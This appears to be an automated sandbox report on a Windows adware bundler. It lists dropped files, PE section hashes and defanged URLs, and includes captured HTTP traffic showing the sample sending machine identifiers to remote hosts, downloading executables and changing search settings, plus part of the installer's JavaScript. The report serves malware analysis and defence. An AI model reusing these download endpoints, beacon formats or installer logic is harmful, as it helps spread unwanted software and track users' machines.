%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (164908 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5 (3749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\1.n[1].txt (164388 bytes)
%Program Files%\Coabuied\ckehack.html5 (8 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (1693 bytes)
%Program Files%\Coabuied\config.ini (147 bytes)
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (1612 bytes)
%Program Files%\Coabuied\wihoy.dll (1657 bytes)
%Program Files%\Atidogrudck\atdagent.dll (1717 bytes)
%Program Files%\Coabuied\DeElevator.dll (260 bytes)
%Program Files%\Coabuied\conf.json (877 bytes)
%Program Files%\Coabuied\shehele.dat (260 bytes)
%Program Files%\Coabuied\matile.dll (309 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (247 bytes)
%Program Files%\Atidogrudck\atdagent.dll.ini (91 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (653285 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (169 bytes)
%WinDir%\Tasks\Chocosyledusy Update.job (5526 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 392593 | 392704 | 4.42083 | c54970e43ae7fb6d349b77b46bf40c0e |
.rdata | 397312 | 288548 | 288768 | 2.55493 | db03ac8b0697ccb16a7696afcf5a8b9f |
.data | 688128 | 16388 | 7168 | 2.73465 | 7e82085e8f6d98eebe8373d48637ed99 |
.rsrc | 708608 | 448 | 512 | 3.51688 | d54acb5766f1897023ceb9a53d618b13 |
.reloc | 712704 | 29172 | 29184 | 3.74339 | eba389e2322dcf3c752080980a0fc413 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
hxxp://dyno3mlj15jgv.cloudfront.net/V38/amipb.js | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload1.php | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
hxxp://d3tufnia3qwp0y.cloudfront.net/main/tmnqck.exe | 54.192.98.62 |
hxxp://cds.j6b5e5z4.hwcdn.net/nop.exe | 205.185.216.10 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/xl8bs23q?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.start.100 | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.start.100 | 54.192.98.18 |
hxxp://d3dzwo5vzf4g44.cloudfront.net/i2/84 | 54.192.98.247 |
hxxp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt | 54.192.98.172 |
hxxp://d3dzwo5vzf4g44.cloudfront.net/s2/1468885288/84 | 54.192.98.247 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch | 54.192.98.18 |
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch | 54.192.98.18 |
hxxp://www.continuumdownload.com/index.php | 54.225.238.18 |
hxxp://www.continuumdownload.com/namen.php | 54.225.238.18 |
hxxp://cdn1.downloadaxel.com/V38/amipb.js | 54.192.98.230 |
hxxp://www.continuumdownload.com/finalize.php | 54.225.238.18 |
hxxp://www.downloadaxel.com/tdownload1.php | 54.225.137.51 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.continuumdownload.com
Content-Length: 590
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=10235&cmdl=amisetup7548__10235_il2.exe /s /ver 1.1.2.41 /t /i NationZoom /u http://VVV.continuumdownload.com/index.php /ci 10235&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup7548__10235_il2&ffver=&i=NationZoom&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAzAA==&netfs=3&s=Y&tmode=1&ts=1468885270&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Jul 2016 23:41:09 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>nop</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.continuumdownload.com:80/index.php" />. <script type="text/javascript" src="hXXp://cdn1.downloadaxel.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r__capp="nop";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';. var g_finish_install_button = '0';. var g_popup_install_all = '0';. var g_eula = '';. var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=10235&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=-31&_vert=3';. var g_icon = '';. var g_comps = [], g_pages = [], c, g_curPage = -1;. var g_cid = '1..288c..0235';. var g_tid = '';. var g_cc = 'UA';. var g_lang = 'en';. var g_ip = '194.242.96.226';. var g_browser = 'ie';. var g_cnt = '43db927915f3640d106
<<< skipped >>>
GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.continuumdownload.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 30 Jun 2016 11:47:44 GMT
If-None-Match: "ecff2ed06ac9c71e23853f0e7bd249e0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadaxel.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Connection: keep-alive
Date: Mon, 18 Jul 2016 23:41:22 GMT
ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"
x-amz-storage-class: REDUCED_REDUNDANCY
Server: AmazonS3
Age: 42468
X-Cache: Hit from cloudfront
Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: A0D4LEmVV3R2Ua2mdWdAyDd-FBpcXHgmojtyoLpVBmhhdQcFiUcIbg==
GET /r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt HTTP/1.1
Accept: */*
Connection: Keep-Alive
Cache-Control: no-cache
Host: d2umj5io7dy7ns.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1520528
Connection: keep-alive
Date: Mon, 18 Jul 2016 11:10:38 GMT
Last-Modified: Mon, 18 Jul 2016 11:05:01 GMT
ETag: "f5b50d11ed03664f4ce0d53699b7dcd0"
x-amz-storage-class: REDUCED_REDUNDANCY
x-amz-meta-content-md5: f5b50d11ed03664f4ce0d53699b7dcd0
Accept-Ranges: bytes
Server: AmazonS3
Age: 45052
X-Cache: Hit from cloudfront
Via: 1.1 ff7053cb54d39315806cac9d50632264.cloudfront.net (CloudFront)
X-Amz-Cf-Id: jOvT85j2LEEZkhz9gucvQ8_dtBPKNtTyY9EAk3cCKH6EznpcJAEayg==
<<< skipped >>>
POST /i2/84 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: d3dzwo5vzf4g44.cloudfront.net
Content-Length: 153
Cache-Control: no-cache
data=bWFjdj01LjEmcHRpZD1hbXomdWlkPVZNd2FyZVhWaXJ0dWFsWElERVhIYXJkWERyaXZlXzAwMDAwMDAwMDAwMDAwMDAwMDAxJnNtZDU9NTQzNTlmOGFiMWVkZWJhOWJmOWYxZjU0MzQ2ZWM3ZDg=
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:29 GMT
X-Powered-By: PHP/5.5.30
ut: 1468885289
Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt
X-Cache: Miss from cloudfront
Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FtMgeqK5wsDvVP8ntH79sjf5n1pvdKyArI307k00iiZJLJ_x9QB7SA==
POST /s2/1468885288/84 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: d3dzwo5vzf4g44.cloudfront.net
Content-Length: 92
Cache-Control: no-cache
uid=ADCA2197E17DE989DA91F56322BE0AB0&uide=VMwareXVirtualXIDEXHardXDrive_00000000000000000001
HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:37 GMT
X-Powered-By: PHP/5.5.30
X-Cache: Miss from cloudfront
Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0c67l8DetnobZftW6Dy_ntjN7xDBjODKLWWG6mYqfiqeYa5uL9Wlqg==
GET /nop.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cds.j6b5e5z4.hwcdn.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 18 Jul 2016 23:41:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450621105"
Cache-Control: max-age=30752
Content-Length: 37172
Content-Type: application/octet-stream
X-HW: 1468885283.dop010.fr7.t,1468885283.cds057.fr7.c
Last-Modified: Sun, 20 Dec 2015 14:18:25 GMT
Content-Disposition: attachment; filename="nop.exe"
<<< skipped >>>
POST /i2/84 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: d3dzwo5vzf4g44.cloudfront.net
Content-Length: 153
Cache-Control: no-cache
data=bWFjdj01LjEmcHRpZD1hbXomdWlkPVZNd2FyZVhWaXJ0dWFsWElERVhIYXJkWERyaXZlXzAwMDAwMDAwMDAwMDAwMDAwMDAxJnNtZDU9NTQzNTlmOGFiMWVkZWJhOWJmOWYxZjU0MzQ2ZWM3ZDg=
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:28 GMT
X-Powered-By: PHP/5.5.30
ut: 1468885288
Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt
X-Cache: Miss from cloudfront
Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 9FfP_j22JGVzR-jF_czRlzRi8YG47xMoLPcCAPhgdxbosinj-Q01rg==
GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: eYPZAmHB4KUxXfv3ak-IIFv1XlKzLDJtq4k88gBhqrqVqNveMAJ0-w==
GET /xl8bs23q?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TWBFtaJOhMHAzII90MPVcXTQkkVu3N81nMN3_RE_Kw944-ikKgzn3w==
GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.start.100 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6uzf9wBjIvF-tU7OpDqcYpIb8h4ZPMpxP0AddFqaVji94qw8NiY4iA==
GET /gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: n
POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.continuumdownload.com
Content-Length: 62
Connection: Keep-Alive
campid=99999&i=NationZoom&prefix=amisetup7604&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Mon, 18 Jul 2016 23:41:16 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 177
Connection: keep-alive
[Data]
exe=amisetup7604.exe
url=hXXp://VVV.downloadaxel.com/tdownload1.php
params=version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0
POST /tdownload1.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.downloadaxel.com
Content-Length: 112
Connection: Keep-Alive
version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0&prefix=amisetup7604
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup7604__99999_il2.exe"
Content-Type: application/x-msdownload
Date: Mon, 18 Jul 2016 23:41:16 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup7604__99999_il2.exe
Content-Length: 812256
Connection: keep-alive
GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.continuumdownload.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadaxel.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 72267
Connection: keep-alive
Date: Thu, 30 Jun 2016 11:52:08 GMT
Last-Modified: Thu, 30 Jun 2016 11:47:44 GMT
ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 42457
X-Cache: Hit from cloudfront
Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)
X-Amz-Cf-Id: agrapGOeVDGt4U0rmB8vT8UhDmQTAvNVN0l_eWkUNLn6qmSEg4SW9A==
//<!--
/* Progress bar */

var g_AmiPbs = new Array();
var g_AmiPbsEx = new Array();
var g_interval = 0;
var g_initComp = 0;
var g_possibleComps = [];
var g_reportedComps = [];
var g_removedComps = [];

var g_disable_updater = false;

//in the version we tests updater task is created firstly
var g_UpdaterTestVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver == '1.1.5.90');
var g_UpdaterTaskCreated = false;

function LogMessage(message) {
    try {
        g_ami.Log(message);
    }
    catch (excpt) {
    }
}

function IsDeclined(name) {
    var declined = 0;
    for (var i = 0; i < g_removedComps.length; i++) {
        if (g_removedComps[i] == name) {
            declined = 1;
            break;
        }
    }
    return declined;
}

function UpdateSkipStatus(sn) {
    if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {
        if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {
            g_ami.WriteProfileString(g_testf, '', sn, 'S');
            g_reportedComps.push(sn);
        }
    }
}

function ShortNameFromName(name) {
    for (c = 0; c < g_comps.length; c++) {
        if (g_comps[c].name == name) {
            return g_comps[c].sn;
        }
    }
    return name;
}

function UpdateComponentsStatus() {
    LogMessage('UpdateComponentsStatus function started');
    for (var j = 0; j < g_possibleComps.length; j++) {

        if (g_possibleComps[j].sn =
<<< skipped >>>
GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YayF0mq1SNybD_LGuqw18qCrLsqQLpCy5ij5ZS-GKvlxebYfSZF8cA==
GET /gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DoS3_zHXN6RMj1QuqUibMrDmlK4Jp-kC4g2YN8tEOt1nSq1K7_DJMw==
GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fy58qKstRrZCUhYrjgymjh8hsFXdkTeIygmpY_Gk39A-pVuhiKoDgg==
GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: XCLWWYd_JCwUieChtQrhT0Dj2BiD3LR0uoQaa5anG2DLHF1jknUTbQ==
GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.start.100 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: m3nP3_KmswDMLUQU7y5gPFRmzO_2CoE9EQ44TfQAfOnreAUL3Z1NKQ==
GET /main/tmnqck.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d3tufnia3qwp0y.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 353992
Connection: keep-alive
Date: Mon, 18 Jul 2016 23:41:24 GMT
Last-Modified: Mon, 18 Jul 2016 23:30:39 GMT
ETag: "54359f8ab1edeba9bf9f1f54346ec7d8"
x-amz-storage-class: REDUCED_REDUNDANCY
x-amz-meta-content-md5: 54359f8ab1edeba9bf9f1f54346ec7d8
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 8cdc69e06e564b9aef153cf0b52204b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Q4uVE8CsHHM7-nJS7mHy7uv6H-OetHuOgUkqcy2ceuT4k_vvFp-H4w==
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.continuumdownload.com
Content-Length: 583
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=99999&cmdl=amisetup7604__99999_il2.exe /s /ver 1.1.2.41 /u http://VVV.continuumdownload.com/index.php /ta /ci 99999 /i NationZoom&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup7604__99999_il2&ffver=&i=NationZoom&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAzAA==&netfs=3&s=Y&ts=1468885284&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Jul 2016 23:41:22 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
2d61
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
 <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
 <title>nop</title>

<script type="text/javascript">

 var g_notCompatibleWithUpdaterComps = ['LootFindKP'];

 var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];

</script>
 <base href="http://VVV.continuumdownload.com:80/index.php" />
 <script type="text/javascript" src="hXXp://cdn1.downloadaxel.com/V38/amipb.js"></script>
 <script type="text/javascript">
var g_r__capp="nop";

 var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';
 var g_finish_install_button = '0';
 var g_popup_install_all = '0';
 var g_eula = '';
 var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=99999&_psb=0&_cnt=70485cab8ae29501976866d3a3ff09b2&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=0&_vert=3';
 var g_icon = '';
 var g_comps = [], g_pages = [], c, g_curPage = -1;
 var g_cid = '99999';
 var g_tid = '';
 var g_cc = 'UA';
 var g_lang = 'en';
 var g_ip = '194.242.96.226';
 var g_browser = 'ie';
 var g_cnt = '9a2093ee772cbb280d9dbc8af51a
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.continuumdownload.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.continuumdownload.com
Content-Length: 204
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=99999&_psb=0&_cnt=70485cab8ae29501976866d3a3ff09b2&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=0&_vert=3&r_nop=0&r_NationZoom=1&nop=3&NationZoom=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Mon, 18 Jul 2016 23:41:22 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2455
Connection: keep-alive
